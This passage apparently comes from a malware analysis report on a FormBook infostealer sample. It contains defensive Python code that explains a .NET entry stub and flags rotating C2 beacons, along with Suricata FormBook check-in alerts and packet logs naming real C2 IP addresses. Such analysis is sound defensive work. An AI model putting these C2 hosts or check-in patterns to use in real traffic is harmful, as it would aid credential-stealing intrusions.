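IMAGE_BASE = 0x400000
ENTRYPOINT_VA = 0x4B306A
SECTIONS = [  # (name, virtual address, virtual size, raw size)
    (".text", 0x2000, 0xB1070, 0xB1200),
    (".rsrc", 0xB4000, 0x1A4C, 0x1C00),
    (".reloc", 0xB6000, 0xC, 0x200),
]
IAT_RVA, IAT_SIZE = 0x2000, 0x8
IMPORTS = {"mscoree.dll": ["_CorExeMain"]}

# Constructed from the disassembly line "jmp dword ptr [00402000h]":
# FF 25 disp32 is the encoding of an absolute indirect near jmp.
ENTRY_STUB = b"\xff\x25" + struct.pack("<I", 0x402000)


def rva_to_section(rva, sections=SECTIONS):
    """Name of the section whose virtual range contains rva, or None.
    This is how the report's "Is in Section" column is derived."""
    for name, va, vsize, _raw in sections:
        if va <= rva < va + vsize:
            return name
    return None


def decode_indirect_jmp(stub, image_base):
    """For 'FF 25 disp32', return the RVA of the pointer slot the jmp reads; else None."""
    if len(stub) < 6 or stub[:2] != b"\xff\x25":
        return None
    slot_va = struct.unpack_from("<I", stub, 2)[0]
    return slot_va - image_base


def check_clr_entry_stub(stub, entry_va, image_base, iat_rva, iat_size, imports, sections=SECTIONS):
    """Explain a managed executable's native entry point from static fields alone:
    one absolute jmp through the IAT, whose single thunk is mscoree!_CorExeMain."""
    findings = []
    slot_rva = decode_indirect_jmp(stub, image_base)
    if slot_rva is None:
        return ["entry point is not an FF 25 indirect jmp; not the standard CLR stub"]
    findings.append(f"entry jmp reads the pointer at RVA {slot_rva:#x}")
    # On PE32 a thunk is 4 bytes, so an 8-byte IAT holds one import plus its null terminator.
    if iat_rva <= slot_rva < iat_rva + iat_size:
        findings.append(f"that slot is inside the IAT (RVA {iat_rva:#x}, {iat_size} bytes"
                        + (", i.e. exactly one import)" if iat_size == 8 else ")"))
    names = [f"{dll}!{fn}" for dll, fns in imports.items() for fn in fns]
    if names == ["mscoree.dll!_CorExeMain"]:
        findings.append("the only import is mscoree.dll!_CorExeMain: the CLR takes over here, "
                        "so the program logic is CIL under the COM descriptor, not native code")
    entry_rva = entry_va - image_base
    sec = rva_to_section(entry_rva, sections)
    findings.append(f"entry RVA {entry_rva:#x} lies in {sec}")
    for name, va, vsize, _raw in sections:
        if name == sec and entry_rva + len(stub) == va + vsize:
            findings.append(f"the {len(stub)}-byte stub is the very end of {name}; "
                            "bytes disassembled after it are alignment padding")
    return findings


if __name__ == "__main__":
    for line in check_clr_entry_stub(ENTRY_STUB, ENTRYPOINT_VA, IMAGE_BASE, IAT_RVA, IAT_SIZE, IMPORTS):
        print("-", line)
```

The practical consequence for triage: a native disassembler stops being useful at the stub, and the next step is to dump the CIL and the metadata behind the COM descriptor, where the unpacker the report flags ("contains potential unpacker") lives.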
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-18T09:02:38.896122+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49723 | 82.221.128.183 | 80 | TCP
2024-09-18T09:03:02.686621+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57951 | 217.160.0.127 | 80 | TCP
2024-09-18T09:03:05.348998+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57952 | 217.160.0.127 | 80 | TCP
2024-09-18T09:03:07.911277+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57953 | 217.160.0.127 | 80 | TCP
2024-09-18T09:03:10.463337+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 57954 | 217.160.0.127 | 80 | TCP
2024-09-18T09:03:17.180314+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57957 | 85.159.66.93 | 80 | TCP
2024-09-18T09:03:19.727259+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57958 | 85.159.66.93 | 80 | TCP
2024-09-18T09:03:22.274064+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57959 | 85.159.66.93 | 80 | TCP
2024-09-18T09:03:24.018954+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 57960 | 85.159.66.93 | 80 | TCP
2024-09-18T09:03:30.443957+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57961 | 13.228.81.39 | 80 | TCP
2024-09-18T09:03:33.005262+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57962 | 13.228.81.39 | 80 | TCP
2024-09-18T09:03:35.518266+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57963 | 13.228.81.39 | 80 | TCP
2024-09-18T09:03:38.098354+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 57964 | 13.228.81.39 | 80 | TCP
2024-09-18T09:03:44.286470+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57965 | 162.0.213.94 | 80 | TCP
2024-09-18T09:03:46.872970+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57966 | 162.0.213.94 | 80 | TCP
2024-09-18T09:03:49.478868+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57967 | 162.0.213.94 | 80 | TCP
2024-09-18T09:03:51.953976+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 57969 | 162.0.213.94 | 80 | TCP
2024-09-18T09:03:57.763893+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57970 | 3.33.130.190 | 80 | TCP
2024-09-18T09:04:00.089121+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57971 | 3.33.130.190 | 80 | TCP
2024-09-18T09:04:03.651445+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57972 | 3.33.130.190 | 80 | TCP
2024-09-18T09:04:05.882314+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 57973 | 3.33.130.190 | 80 | TCP
2024-09-18T09:04:11.391462+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57974 | 13.248.169.48 | 80 | TCP
2024-09-18T09:04:13.917505+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57975 | 13.248.169.48 | 80 | TCP
2024-09-18T09:04:16.464696+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 57976 | 13.248.169.48 | 80 | TCP
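The alert table shows the infected host walking through seven distinct destinations in about a minute and a half, sending each one three POST check-ins (SID 2855464) followed by a single GET (SID 2855465); the first destination in the trace shows only the GET and the trace ends during the seventh destination's POSTs. A single beacon to one host looks like ordinary HTTP; the rotation across hosts is what distinguishes this traffic. The following added example, not part of the report, works over a tab-separated copy of the first nine rows of that table: it parses the rows, reconstructs the per-destination method sequence, and flags a source whose check-in alerts for one family span several distinct destinations inside a short window. Only the alert lines themselves come from the report; the thresholds are assumptions chosen for the example.

```python
import re
from collections import OrderedDict
from datetime import datetime, timedelta

# Alert rows copied from the report's Suricata table (first three destinations),
# tab-separated in the table's column order: timestamp, SID, signature, severity,
# source IP, source port, destination IP, destination port, protocol.
ALERTS = (
    "2024-09-18T09:02:38.896122+0200\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t1\t192.168.2.6\t49723\t82.221.128.183\t80\tTCP\n"
    "2024-09-18T09:03:02.686621+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t57951\t217.160.0.127\t80\tTCP\n"
    "2024-09-18T09:03:05.348998+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t57952\t217.160.0.127\t80\tTCP\n"
    "2024-09-18T09:03:07.911277+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t57953\t217.160.0.127\t80\tTCP\n"
    "2024-09-18T09:03:10.463337+0200\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t1\t192.168.2.6\t57954\t217.160.0.127\t80\tTCP\n"
    "2024-09-18T09:03:17.180314+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t57957\t85.159.66.93\t80\tTCP\n"
    "2024-09-18T09:03:19.727259+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t57958\t85.159.66.93\t80\tTCP\n"
    "2024-09-18T09:03:22.274064+0200\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t57959\t85.159.66.93\t80\tTCP\n"
    "2024-09-18T09:03:24.018954+0200\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t1\t192.168.2.6\t57960\t85.159.66.93\t80\tTCP\n"
)


def parse_alerts(text):
    """Parse tab-separated alert rows into dicts, sorted by time, with the HTTP
    method lifted out of the signature name."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, src, sport, dst, dport, proto = line.split("\t")
        method = re.search(r"\((GET|POST)\)", sig)
        rows.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid),
            "sig": sig,
            "method": method.group(1) if method else None,
            "src": src, "sport": int(sport), "dst": dst, "dport": int(dport),
        })
    return sorted(rows, key=lambda r: r["ts"])


def checkin_sequences(rows):
    """Per (source, destination) pair, in first-seen order, the HTTP methods of the check-ins."""
    seq = OrderedDict()
    for r in rows:
        seq.setdefault((r["src"], r["dst"]), []).append(r["method"])
    return seq


def span_seconds(rows):
    """Seconds between the first and the last alert."""
    return (rows[-1]["ts"] - rows[0]["ts"]).total_seconds()


def rotating_c2_hosts(rows, family="FormBook", min_destinations=3, window_seconds=300):
    """Sources whose check-in alerts for `family` cover at least `min_destinations`
    distinct destinations within any stretch of `window_seconds`.
    Returns {source: most distinct destinations seen in one window}."""
    window = timedelta(seconds=window_seconds)
    by_src = {}
    for r in rows:
        if family in r["sig"]:
            by_src.setdefault(r["src"], []).append(r)
    flagged = {}
    for src, rs in by_src.items():
        start = 0
        for end in range(len(rs)):            # sliding window over time-ordered alerts
            while rs[end]["ts"] - rs[start]["ts"] > window:
                start += 1
            seen = {r["dst"] for r in rs[start:end + 1]}
            if len(seen) >= min_destinations:
                flagged[src] = max(flagged.get(src, 0), len(seen))
    return flagged


if __name__ == "__main__":
    alerts = parse_alerts(ALERTS)
    for (src, dst), methods in checkin_sequences(alerts).items():
        print(f"{src} -> {dst}: {' '.join(methods)}")
    print(f"{span_seconds(alerts):.1f} s between first and last alert; rotation: {rotating_c2_hosts(alerts)}")
```

Run over the full table the same logic reports seven destinations for 192.168.2.6 inside the default window; the per-destination sequences also make it obvious which hosts answered (the report's packet list shows the server replying with data on port 80 for each of them), which is the list to pull into blocking and retro-hunting.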
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 18, 2024 09:02:38.226147890 CEST | 49723 | 80 | 192.168.2.6 | 82.221.128.183
Sep 18, 2024 09:02:38.231193066 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:02:38.231316090 CEST | 49723 | 80 | 192.168.2.6 | 82.221.128.183
Sep 18, 2024 09:02:38.238545895 CEST | 49723 | 80 | 192.168.2.6 | 82.221.128.183
Sep 18, 2024 09:02:38.243834972 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:02:38.895858049 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:02:38.895900965 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:02:38.895914078 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:02:38.895926952 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:02:38.895937920 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:02:38.895950079 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:02:38.895962954 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:02:38.895976067 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:02:38.895987034 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:02:38.895998955 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:02:38.896019936 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:02:38.896121979 CEST | 49723 | 80 | 192.168.2.6 | 82.221.128.183
Sep 18, 2024 09:02:38.896183014 CEST | 49723 | 80 | 192.168.2.6 | 82.221.128.183
Sep 18, 2024 09:02:38.901252031 CEST | 49723 | 80 | 192.168.2.6 | 82.221.128.183
Sep 18, 2024 09:02:38.906069040 CEST | 80 | 49723 | 82.221.128.183 | 192.168.2.6
Sep 18, 2024 09:03:02.041250944 CEST | 57951 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:02.046226025 CEST | 80 | 57951 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:02.046328068 CEST | 57951 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:02.057301044 CEST | 57951 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:02.062153101 CEST | 80 | 57951 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:02.686312914 CEST | 80 | 57951 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:02.686343908 CEST | 80 | 57951 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:02.686620951 CEST | 57951 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:03.571038961 CEST | 57951 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:04.589512110 CEST | 57952 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:04.706610918 CEST | 80 | 57952 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:04.706726074 CEST | 57952 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:04.721792936 CEST | 57952 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:04.726574898 CEST | 80 | 57952 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:05.348718882 CEST | 80 | 57952 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:05.348751068 CEST | 80 | 57952 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:05.348998070 CEST | 57952 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:06.227230072 CEST | 57952 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:07.246198893 CEST | 57953 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:07.251327038 CEST | 80 | 57953 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:07.251427889 CEST | 57953 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:07.261435986 CEST | 57953 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:07.268183947 CEST | 80 | 57953 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:07.268209934 CEST | 80 | 57953 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:07.910938978 CEST | 80 | 57953 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:07.911031961 CEST | 80 | 57953 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:07.911277056 CEST | 57953 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:08.774342060 CEST | 57953 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:09.792150021 CEST | 57954 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:09.802552938 CEST | 80 | 57954 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:09.802650928 CEST | 57954 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:09.808584929 CEST | 57954 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:09.813621044 CEST | 80 | 57954 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:10.462944031 CEST | 80 | 57954 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:10.463237047 CEST | 80 | 57954 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:10.463336945 CEST | 57954 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:10.465800047 CEST | 57954 | 80 | 192.168.2.6 | 217.160.0.127
Sep 18, 2024 09:03:10.470716000 CEST | 80 | 57954 | 217.160.0.127 | 192.168.2.6
Sep 18, 2024 09:03:15.647398949 CEST | 57957 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:15.653103113 CEST | 80 | 57957 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:15.653225899 CEST | 57957 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:15.667309999 CEST | 57957 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:15.672188044 CEST | 80 | 57957 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:17.180314064 CEST | 57957 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:17.358644009 CEST | 80 | 57957 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:17.358702898 CEST | 57957 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:18.199178934 CEST | 57958 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:18.204054117 CEST | 80 | 57958 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:18.204157114 CEST | 57958 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:18.214801073 CEST | 57958 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:18.219873905 CEST | 80 | 57958 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:19.727258921 CEST | 57958 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:19.732714891 CEST | 80 | 57958 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:19.732814074 CEST | 57958 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:20.745935917 CEST | 57959 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:20.751147032 CEST | 80 | 57959 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:20.751266003 CEST | 57959 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:20.761667013 CEST | 57959 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:20.766556978 CEST | 80 | 57959 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:20.766699076 CEST | 80 | 57959 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:22.274064064 CEST | 57959 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:22.279366970 CEST | 80 | 57959 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:22.279531956 CEST | 57959 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:23.293046951 CEST | 57960 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:23.297921896 CEST | 80 | 57960 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:23.298026085 CEST | 57960 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:23.305459023 CEST | 57960 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:23.310339928 CEST | 80 | 57960 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:24.018718004 CEST | 80 | 57960 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:24.018807888 CEST | 80 | 57960 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:24.018954039 CEST | 57960 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:24.053548098 CEST | 57960 | 80 | 192.168.2.6 | 85.159.66.93
Sep 18, 2024 09:03:24.058527946 CEST | 80 | 57960 | 85.159.66.93 | 192.168.2.6
Sep 18, 2024 09:03:29.500895977 CEST | 57961 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:29.505940914 CEST | 80 | 57961 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:29.506026030 CEST | 57961 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:29.515820980 CEST | 57961 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:29.520807028 CEST | 80 | 57961 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:30.443711996 CEST | 80 | 57961 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:30.443747997 CEST | 80 | 57961 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:30.443957090 CEST | 57961 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:31.024360895 CEST | 57961 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:32.043119907 CEST | 57962 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:32.055206060 CEST | 80 | 57962 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:32.055352926 CEST | 57962 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:32.074074030 CEST | 57962 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:32.081315994 CEST | 80 | 57962 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:33.004784107 CEST | 80 | 57962 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:33.005214930 CEST | 80 | 57962 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:33.005261898 CEST | 57962 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:33.586653948 CEST | 57962 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:34.607350111 CEST | 57963 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:34.612492085 CEST | 80 | 57963 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:34.612651110 CEST | 57963 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:34.625386953 CEST | 57963 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:34.631051064 CEST | 80 | 57963 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:34.631578922 CEST | 80 | 57963 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:35.518085003 CEST | 80 | 57963 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:35.518131971 CEST | 80 | 57963 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:35.518265963 CEST | 57963 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:36.139111042 CEST | 57963 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:37.151741982 CEST | 57964 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:37.156785965 CEST | 80 | 57964 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:37.157819986 CEST | 57964 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:37.164659977 CEST | 57964 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:37.169604063 CEST | 80 | 57964 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:38.097789049 CEST | 80 | 57964 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:38.098300934 CEST | 80 | 57964 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:38.098354101 CEST | 57964 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:38.100146055 CEST | 57964 | 80 | 192.168.2.6 | 13.228.81.39
Sep 18, 2024 09:03:38.104896069 CEST | 80 | 57964 | 13.228.81.39 | 192.168.2.6
Sep 18, 2024 09:03:43.696453094 CEST | 57965 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:43.701427937 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:43.701512098 CEST | 57965 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:43.712222099 CEST | 57965 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:43.717272997 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.286305904 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.286324978 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.286469936 CEST | 57965 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:44.286750078 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.286762953 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.286787033 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.286802053 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.286803961 CEST | 57965 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:44.286817074 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.286833048 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.286848068 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.286858082 CEST | 57965 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:44.286865950 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.286879063 CEST | 57965 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:44.286907911 CEST | 57965 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:44.291356087 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.291425943 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.291440964 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.291456938 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.291477919 CEST | 57965 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:44.291512012 CEST | 57965 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:44.373039007 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.373533964 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.373549938 CEST | 80 | 57965 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:44.373588085 CEST | 57965 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:44.373630047 CEST | 57965 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:45.227202892 CEST | 57965 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:46.248223066 CEST | 57966 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:46.253376007 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.253449917 CEST | 57966 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:46.270148993 CEST | 57966 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:46.275053024 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.872869015 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.872919083 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.872936010 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.872950077 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.872970104 CEST | 57966 | 80 | 192.168.2.6 | 162.0.213.94
Sep 18, 2024 09:03:46.872971058 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
Sep 18, 2024 09:03:46.872987032 CEST | 80 | 57966 | 162.0.213.94 | 192.168.2.6
